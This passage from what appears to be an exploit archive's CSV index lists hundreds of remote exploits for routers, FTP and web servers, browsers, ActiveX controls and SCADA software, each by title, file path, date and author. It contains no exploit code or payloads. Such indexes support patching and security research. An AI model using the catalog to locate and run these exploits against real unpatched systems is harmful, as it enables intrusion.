Unauthenticated File-system Access",2010-04-16,fizix610,hardware,remote, -12298,exploits/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote, -12304,exploits/multiple/remote/12304.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (1)",2010-04-20,chr1x,multiple,remote, -12308,exploits/windows/remote/12308.txt,"Multi-Threaded HTTP Server 1.1 - Source Disclosure",2010-04-20,Dr_IDE,windows,remote, -12309,exploits/windows/remote/12309.txt,"Mongoose Web Server 2.8 - Multiple Directory Traversals",2010-04-20,Dr_IDE,windows,remote, -12310,exploits/windows/remote/12310.txt,"Acritum Femitter 1.03 - Directory Traversal",2010-04-20,Dr_IDE,windows,remote, -12312,exploits/windows/remote/12312.rb,"EasyFTP Server 1.7.0.2 - CWD Buffer Overflow (Metasploit)",2010-04-20,"Paul Makowski",windows,remote, -12320,exploits/windows/remote/12320.txt,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Remote Buffer Overflow",2010-04-21,shinnai,windows,remote, -12331,exploits/windows/remote/12331.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (2)",2010-04-20,Dr_IDE,windows,remote, -12332,exploits/windows/remote/12332.pl,"Xftp client 3.0 - 'PWD' Remote Overflow",2010-04-22,zombiefx,windows,remote, -12343,exploits/multiple/remote/12343.txt,"Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure",2010-04-22,"Deniz Cevik",multiple,remote, -12367,exploits/windows/remote/12367.html,"HP Digital Imaging - 'hpodio08.dll' Insecure Method",2010-04-24,"ThE g0bL!N",windows,remote, -12380,exploits/windows/remote/12380.pl,"Rumba FTP Client 4.2 - PASV Buffer Overflow (SEH)",2010-04-25,zombiefx,windows,remote, -12417,exploits/windows/remote/12417.py,"Bigant Messenger 2.52 - 'AntCore.dll RegisterCom()' Remote Heap Overflow",2010-04-27,mr_me,windows,remote, -12480,exploits/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote, -12495,exploits/windows/remote/12495.pl,"ProSSHD 1.2 - Authenticated Remote (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",windows,remote, -12498,exploits/windows/remote/12498.txt,"VicFTPS 5.0 - Directory Traversal",2010-05-04,chr1x,windows,remote, -12511,exploits/windows/remote/12511.txt,"MDaemon Mailer Daemon 11.0.1 - Remote File Disclosure",2010-05-05,kingcope,windows,remote, -12512,exploits/windows/remote/12512.py,"Ziepod+ 1.0 - CrossApplication Scripting",2010-05-05,sinn3r,windows,remote, -12573,exploits/windows/remote/12573.html,"Apple Safari 4.0.5 - 'parent.close()' Memory Corruption Code Execution",2010-05-11,"Krystian Kloskowski",windows,remote, -12580,exploits/windows/remote/12580.txt,"MiniWebsvr 0.0.10 - Directory Traversal / Listing",2010-05-12,Dr_IDE,windows,remote, -12581,exploits/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote, -12582,exploits/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote, -12587,exploits/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities",2010-05-13,"fl0 fl0w",linux,remote,21 -12614,exploits/windows/remote/12614.txt,"Apple Safari 4.0.5 - 'parent.close()' Memory Corruption (ASLR + DEP Bypass)",2010-05-15,"Alexey Sintsov",windows,remote, -12657,exploits/windows/remote/12657.txt,"Google Chrome 4.1.249.1059 - Cross Origin Bypass in Google URL (GURL)",2010-05-19,"Jordi Chancel",windows,remote, -12663,exploits/windows/remote/12663.html,"CommuniCrypt Mail 1.16 - 'ANSMTP.dll/AOSMTP.dll' ActiveX",2010-05-19,Lincoln,windows,remote, -12673,exploits/windows/remote/12673.txt,"ComponentOne VSFlexGrid 7/8 - 'Archive()' method Remote Buffer Overflow",2010-05-20,Ma3sTr0-Dz,windows,remote, -14321,exploits/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Remote Buffer Overflow",2010-07-10,blake,windows,remote, -12804,exploits/multiple/remote/12804.txt,"Nginx 0.6.36 - Directory Traversal",2010-05-30,cp77fk4r,multiple,remote, -12815,exploits/windows/remote/12815.txt,"GoAheaad WebServer - Source Code Disclosure",2010-05-30,Sil3nt_Dre4m,windows,remote, -12834,exploits/windows/remote/12834.py,"XFTP 3.0 Build 0239 - 'Filename' Remote Buffer Overflow",2010-06-01,sinn3r,windows,remote, -12865,exploits/hardware/remote/12865.txt,"Motorola Surfboard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",hardware,remote, -40091,exploits/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80 -13588,exploits/multiple/remote/13588.pl,"2^6 TCP Control Bit - Fuzzer (No ECN or CWR)",2010-01-11,ShadowHatesYou,multiple,remote, -13735,exploits/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Remote Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080 -13787,exploits/multiple/remote/13787.txt,"Adobe Flash / Reader - Live Malware (PoC)",2010-06-09,anonymous,multiple,remote, -13808,exploits/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly (MS03-044)",2010-06-10,"Tavis Ormandy",windows,remote, -13818,exploits/windows/remote/13818.txt,"Nginx 0.8.36 - Source Disclosure / Denial of Service",2010-06-11,Dr_IDE,windows,remote, -13822,exploits/windows/remote/13822.txt,"Nginx 0.7.65/0.8.39 (dev) - Source Disclosure / Download",2010-06-11,"Jose A. Vazquez",windows,remote, -13834,exploits/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote, -13850,exploits/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison Null Byte",2010-06-13,kingcope,multiple,remote,80 -13853,exploits/linux/remote/13853.pl,"UnrealIRCd 3.2.8.1 - Remote Downloader/Execute",2010-06-13,anonymous,linux,remote, -13903,exploits/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - Remote Overflow (SEH)",2010-06-17,b0nd,windows,remote, -13932,exploits/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote, -14360,exploits/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote, -14013,exploits/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote, -14091,exploits/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 (OSX) - Remote Code Execution",2010-06-28,dookie,osx,remote, -30100,exploits/windows/remote/30100.html,"British TeleCommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",windows,remote, -14179,exploits/windows/remote/14179.txt,"Microsoft IIS 5.0 - Authentication Bypass (MS10-065)",2010-07-02,"Soroush Dalili",windows,remote, -14180,exploits/windows/remote/14180.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 -14181,exploits/windows/remote/14181.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 -14182,exploits/windows/remote/14182.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 -14194,exploits/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote Overflow",2010-07-03,dmc,windows,remote, -14195,exploits/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)",2010-07-03,blake,windows,remote, -14200,exploits/windows/remote/14200.html,"Registry OCX 1.5 - ActiveX Buffer Overflow",2010-07-04,blake,windows,remote, -14222,exploits/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 (Windows 7) - Remote Buffer Overflow (ASLR + DEP Bypass)",2010-07-05,Node,windows,remote, -14248,exploits/windows/remote/14248.py,"minerCPP 0.4b - Remote Buffer Overflow / Format String",2010-07-06,l3D,windows,remote, -14254,exploits/osx/remote/14254.py,"Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Overflow",2010-07-06,d1dn0t,osx,remote, -14267,exploits/windows/remote/14267.txt,"EA Battlefield 2 / Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote, -14269,exploits/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,windows,remote, -14272,exploits/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 (OSX Snow Leopard) - IRC Client Remote Code Execution (ROP)",2010-07-08,d1dn0t,osx,remote, -14275,exploits/windows/remote/14275.txt,"Real Player 12.0.0.879 - Code Execution",2010-07-08,webDEViL,windows,remote, -14287,exploits/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Remote Overflow (DEP Bypass)",2010-07-09,dmc,windows,remote, -14309,exploits/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote, -14385,exploits/windows/remote/14385.html,"Avant Browser 11.7 build 45 - Clickjacking",2010-07-17,"Pouya Daneshmand",windows,remote, -14386,exploits/multiple/remote/14386.html,"Opera Browser 10.60 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote, -14387,exploits/multiple/remote/14387.html,"Apple Safari 4.0.2 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote, -14388,exploits/multiple/remote/14388.html,"Netscape Browser 9.0.0.6 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote, -14399,exploits/windows/remote/14399.py,"EasyFTP Server 1.7.0.11 - 'MKD' Authenticated Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote, -14400,exploits/windows/remote/14400.py,"EasyFTP Server 1.7.0.11 - 'LIST' Authenticated Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote, -14402,exploits/windows/remote/14402.py,"EasyFTP Server 1.7.0.11 - 'CWD' Authenticated Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote, -14407,exploits/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote, -14409,exploits/aix/remote/14409.pl,"AIX5l with FTP-Server - Hash Disclosure",2010-07-18,kingcope,aix,remote, -14412,exploits/windows/remote/14412.rb,"Hero DVD - Remote Buffer Overflow (Metasploit)",2010-07-19,Madjix,windows,remote, -14416,exploits/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption",2010-07-20,"Elazar Broad",windows,remote, -14447,exploits/windows/remote/14447.html,"Multiple Browsers (FF3.6.7/SM 2.0.6) - Clickjacking",2010-07-23,"Pouya Daneshmand",windows,remote, -14451,exploits/windows/remote/14451.rb,"EasyFTP Server 1.7.0.11 - 'LIST' Authenticated Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote, -14456,exploits/aix/remote/14456.c,"IBM AIX 5l - 'FTPd' Remote DES Hash",2010-07-24,kingcope,aix,remote, -14496,exploits/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen & corelanc0d3r",windows,remote, -14489,exploits/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal",2010-07-28,mywisdom,unix,remote, -14492,exploits/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service - Design Flaw",2010-07-28,Spider,windows,remote, -14505,exploits/windows/remote/14505.html,"Barcodewiz Barcode ActiveX Control 3.29 - Remote Buffer Overflow (SEH)",2010-07-30,loneferret,windows,remote, -14514,exploits/windows/remote/14514.html,"SigPlus Pro 3.74 - ActiveX 'LCDWriteString()' Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass)",2010-07-31,mr_me,windows,remote, -14519,exploits/windows/remote/14519.html,"Barcodewiz Barcode ActiveX Control 3.29 - Remote HeapSpray (Internet Explorer 6/7)",2010-07-31,Dr_IDE,windows,remote, -14522,exploits/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)",2010-08-01,"Ben Schmidt",windows,remote, -14539,exploits/windows/remote/14539.html,"FathFTP 1.8 - 'RasIsConnected Method' ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote, -14536,exploits/hardware/remote/14536.txt,"EMC Celerra NAS Appliance - Unauthorized Access to Root NFS Export",2010-08-03,"Trustwave's SpiderLabs",hardware,remote, -14551,exploits/windows/remote/14551.html,"FathFTP 1.8 - 'DeleteFile Method' ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote, -14552,exploits/windows/remote/14552.html,"FathFTP 1.8 - 'EnumFiles Method' ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote, -14553,exploits/windows/remote/14553.html,"FathFTP 1.8 - 'FileExists Method' ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote, -14580,exploits/windows/remote/14580.html,"Advanced File Vault - 'eSellerateControl350.dll' ActiveX HeapSpray",2010-08-08,"ThE g0bL!N",windows,remote, -14586,exploits/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - 'FileExists' ActiveX Buffer Overflow",2010-08-09,s-dz,windows,remote, -14599,exploits/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray (ASLR + DEP Bypass)",2010-08-10,Dr_IDE,windows,remote, -14600,exploits/windows/remote/14600.html,"SopCast 3.2.9 - Remote Command Execution",2010-08-10,sud0,windows,remote, -14602,exploits/multiple/remote/14602.txt,"Play! Framework 1.0.3.1 - Directory Traversal",2010-08-10,kripthor,multiple,remote, -14605,exploits/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow HeapSpray",2010-08-10,Madjix,windows,remote, -14604,exploits/windows/remote/14604.py,"Easy FTP 1.7.0.11 - 'NLST' / 'NLST -al' / 'APPE' / 'RETR' / 'SIZE' / 'XCWD' Remote Buffer Overflow",2010-08-10,"Rabih Mohsen",windows,remote, -14623,exploits/windows/remote/14623.py,"EasyFTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflows",2010-08-11,"Glafkos Charalambous",windows,remote,21 -14658,exploits/windows/remote/14658.txt,"123 FlashChat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote, -14641,exploits/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,anonymous,multiple,remote, -14674,exploits/windows/remote/14674.txt,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote, -14779,exploits/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote, -14853,exploits/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer",2010-09-01,Abysssec,windows,remote, -14856,exploits/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,windows,remote, -14857,exploits/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal",2010-09-01,chr1x,windows,remote, -14875,exploits/multiple/remote/14875.txt,"Accton-based switches (3com / Dell / SMC / Foundry / EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",multiple,remote, -14886,exploits/windows/remote/14886.py,"Microsoft Movie Maker - Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote, -14878,exploits/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 - ActiveX 'extSetOwner()' Remote Code Execution (2)",2010-09-03,Abysssec,windows,remote, -14885,exploits/windows/remote/14885.html,"Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Exeuction",2010-11-17,Dr_IDE,windows,remote, -14895,exploits/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution",2010-09-05,Abysssec,windows,remote, -14925,exploits/linux/remote/14925.txt,"weborf 0.12.2 - Directory Traversal",2010-09-07,Rew,linux,remote, -14941,exploits/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln_ Nullthreat_ rick2600",win_x86,remote,80 -14976,exploits/linux/remote/14976.txt,"YOPS - Web Server Remote Command Execution",2010-09-11,"Rodrigo Escobar",linux,remote, -15001,exploits/windows/remote/15001.html,"Novell iPrint Client Browser Plugin - ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote, -15042,exploits/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - 'call-back-url' Remote Stack Overflow",2010-09-19,Abysssec,windows,remote, -15005,exploits/multiple/remote/15005.txt,"IBM Lotus Domino iCalendar - Email Address Stack Buffer Overflow",2010-09-14,"A. Plaskett",multiple,remote, -15016,exploits/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)",2010-09-15,Node,windows,remote, -15048,exploits/windows/remote/15048.txt,"SmarterMail 7.1.3876 - Directory Traversal",2010-09-19,sqlhacker,windows,remote, -15056,exploits/windows/remote/15056.py,"Java 6.19 CMM readMabCurveData - Remote Stack Overflow",2010-09-20,Abysssec,windows,remote, -15071,exploits/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - 'SoftekATL.dll' Remote Buffer Overflow (PoC)",2010-09-21,LiquidWorm,windows,remote, -15072,exploits/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote, -15073,exploits/windows/remote/15073.rb,"Novell iPrint Client - ActiveX Control 'debug' Remote Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote, -15168,exploits/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 - ActiveX 'extSetOwner()' Remote Code Execution (Metasploit)",2010-10-01,Trancer,windows,remote, -15186,exploits/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal",2010-10-02,m0ebiusc0de,ios,remote, -15213,exploits/asp/remote/15213.pl,"Microsoft ASP.NET - Padding Oracle (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote, -15600,exploits/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution",2010-11-23,Rew,windows,remote, -15601,exploits/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution",2010-11-23,Rew,windows,remote, -15231,exploits/windows/remote/15231.py,"Sync Breeze Server 2.2.30 - Remote Buffer Overflow",2010-10-11,"xsploited security",windows,remote, -15235,exploits/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP",2010-10-11,mr_me,windows,remote, -15238,exploits/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow",2010-10-12,"xsploited security",windows,remote, -15241,exploits/windows/remote/15241.txt,"Oracle Java 6 - OBJECT tag 'launchjnlp'/'docbase' Remote Buffer Overflow",2010-10-13,Skylined,windows,remote, -15244,exploits/unix/remote/15244.txt,"Oracle Virtual Server Agent - Command Injection",2010-10-13,"Nahuel Grisolia",unix,remote, -15265,exploits/asp/remote/15265.rb,"Microsoft ASP.NET - Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote, -15266,exploits/windows/remote/15266.txt,"Microsoft Windows - NTLM Weak Nonce (MS10-012)",2010-10-17,"Hernan Ochoa",windows,remote, -15288,exploits/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class Same-of-Origin 'SOP' Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote, -15292,exploits/windows/remote/15292.rb,"Microsoft ASP.NET - Auto-Decryptor File Download (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote, -15296,exploits/windows/remote/15296.txt,"Adobe Shockwave Player - 'rcsL chunk' Memory Corruption",2010-10-21,Abysssec,windows,remote, -15298,exploits/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote, -15318,exploits/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote, -15333,exploits/windows/remote/15333.txt,"MinaliC WebServer 1.0 - Directory Traversal",2010-10-27,"John Leitch",windows,remote, -15336,exploits/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure / File Download",2010-10-27,Dr_IDE,windows,remote, -15337,exploits/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Remote Buffer Overflow",2010-10-27,blake,windows,remote, -15347,exploits/windows/remote/15347.py,"XBMC 9.04.1r20672 - 'soap_action_name' POST UPnP 'sscanf' Remote Buffer Overflow",2010-10-28,n00b,windows,remote, -15349,exploits/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote, -15352,exploits/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Remote Overflow",2010-10-29,anonymous,windows,remote, -15357,exploits/windows/remote/15357.php,"Home FTP Server 1.11.1.149 - 'RETR'/'DELE'/'RMD' Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote, -15358,exploits/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote, -15368,exploits/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote, -15371,exploits/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote, -15373,exploits/windows/remote/15373.txt,"Mongoose Web Server 2.11 - Directory Traversal",2010-11-01,nitr0us,windows,remote, -15421,exploits/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption",2010-11-04,ryujin,windows,remote, -15423,exploits/android/remote/15423.html,"Google Android 2.0 < 2.1 - Reverse Shell",2010-11-05,"MJ Keith",android,remote, -15427,exploits/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote, -15437,exploits/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote, -15438,exploits/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Directory Traversal",2010-11-06,"Yakir Wizman",windows,remote, -15445,exploits/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal",2010-11-06,chr1x,windows,remote, -15449,exploits/linux/remote/15449.pl,"ProFTPd IAC 1.3.x - Remote Command Execution",2010-11-07,kingcope,linux,remote, -15450,exploits/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21 -15505,exploits/hardware/remote/15505.txt,"Camtron CMNC-200 IP Camera - Directory Traversal",2010-11-13,"Trustwave's SpiderLabs",hardware,remote, -15548,exploits/android/remote/15548.html,"Google Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",android,remote, -15617,exploits/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote, -15631,exploits/hardware/remote/15631.txt,"HP LaserJet - Directory Traversal in PJL Interface",2010-11-29,"n.runs AG",hardware,remote, -15648,exploits/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution",2010-12-01,bz1p,windows,remote, -15655,exploits/windows/remote/15655.html,"J-Integra 2.11 - ActiveX SetIdentity() Buffer Overflow",2010-12-01,Dr_IDE,windows,remote, -15658,exploits/windows/remote/15658.rb,"Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Remote Buffer Overflow (Metasploit)",2010-12-02,bz1p,windows,remote, -15662,exploits/linux/remote/15662.txt,"ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution",2010-12-02,anonymous,linux,remote,21 -15664,exploits/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote, -15668,exploits/windows/remote/15668.html,"Viscom Image Viewer CP Gold 6 - ActiveX 'TifMergeMultiFiles()' Remote Buffer Overflow",2010-12-03,Dr_IDE,windows,remote, -15689,exploits/windows/remote/15689.py,"Freefloat FTP Server - Remote Buffer Overflow",2010-12-05,0v3r,windows,remote, -15717,exploits/multiple/remote/15717.txt,"VMware Tools - Update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote, -15723,exploits/freebsd/remote/15723.c,"Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow",2010-12-10,kingcope,freebsd,remote, -15725,exploits/linux/remote/15725.pl,"Exim 4.63 - Remote Command Execution",2010-12-11,kingcope,linux,remote, -15733,exploits/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 - 'PrintControl.dll' ActiveX",2010-12-14,Dr_IDE,windows,remote, -15746,exploits/windows/remote/15746.rb,"Microsoft Internet Explorer 8 - CSS Parser",2010-12-15,"Nephi Johnson",windows,remote, -15802,exploits/windows/remote/15802.txt,"ecava IntegraXor 3.6.4000.0 - Directory Traversal",2010-12-21,"Luigi Auriemma",windows,remote, -15806,exploits/linux/remote/15806.txt,"Citrix Access Gateway - Command Injection",2010-12-22,"George D. Gal",linux,remote, -15809,exploits/windows/remote/15809.html,"Microsoft WMITools - ActiveX Remote Command Execution",2010-12-22,WooYun,windows,remote, -15834,exploits/windows/remote/15834.py,"Kolibri 2.0 - 'HEAD' Remote Buffer Overflow RET (SEH)",2010-12-26,TheLeader,windows,remote, -15842,exploits/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",hardware,remote, -15861,exploits/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote, -15862,exploits/windows/remote/15862.txt,"QuickPHP Web Server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote, -15866,exploits/windows/remote/15866.html,"Chilkat Software FTP2 - ActiveX Component Remote Code Execution",2010-12-30,rgod,windows,remote, -15868,exploits/windows/remote/15868.pl,"QuickPHP Web Server - Arbitrary '.php' File Download",2010-12-30,"Yakir Wizman",windows,remote, -15869,exploits/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote, -15885,exploits/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote, -18245,exploits/multiple/remote/18245.py,"Splunk - Remote Command Execution",2011-12-15,"Gary O'Leary-Steele",multiple,remote, -15991,exploits/windows/remote/15991.html,"Real Networks RealPlayer SP - 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",windows,remote, -15957,exploits/windows/remote/15957.py,"KingView 6.5.3 - SCADA HMI Heap Overflow (PoC)",2011-01-09,"Dillon Beresford",windows,remote, -15937,exploits/multiple/remote/15937.pl,"NetSupport Manager Agent - Remote Buffer Overflow (1)",2011-01-08,ikki,multiple,remote, -16123,exploits/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote, -15963,exploits/windows/remote/15963.rb,"Microsoft Windows - Common Control Library 'Comctl32' Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote, -15984,exploits/windows/remote/15984.html,"Microsoft Data Access Components - Remote Overflow (PoC) (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote, -16014,exploits/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Command Execution",2011-01-19,Dr_IDE,windows,remote, -16036,exploits/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow",2011-01-23,"cd1zz & iglesiasgg",windows,remote, -16041,exploits/multiple/remote/16041.txt,"Sun Microsystems SunScreen Firewall - Privilege Escalation",2011-01-25,kingcope,multiple,remote, -16052,exploits/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 - Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote, -16053,exploits/windows/remote/16053.txt,"Oracle Document Capture - Actbar2.ocx Insecure Method",2011-01-26,"Evdokimov Dmitriy",windows,remote, -16055,exploits/windows/remote/16055.txt,"Oracle Document Capture - 'empop3.dll' Insecure Methods",2011-01-26,"Evdokimov Dmitriy",windows,remote, -16056,exploits/windows/remote/16056.txt,"Oracle - Document Capture Insecure READ Method",2011-01-26,"Alexey Sintsov",windows,remote, -16075,exploits/windows/remote/16075.pl,"Caedo HTTPd Server 0.5.1 ALPHA - Arbitrary File Download",2011-01-29,"Zer0 Thunder",windows,remote, -16078,exploits/windows/remote/16078.py,"SDP Downloader 2.3.0 - 'http_response' Remote Buffer Overflow",2011-01-30,sup3r,windows,remote, -16100,exploits/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Root Account Credentials",2011-02-02,"Cisco Security",hardware,remote, -16101,exploits/windows/remote/16101.py,"FTPGetter 3.58.0.21 - 'PASV' Remote Buffer Overflow",2011-02-03,modpr0be,windows,remote, 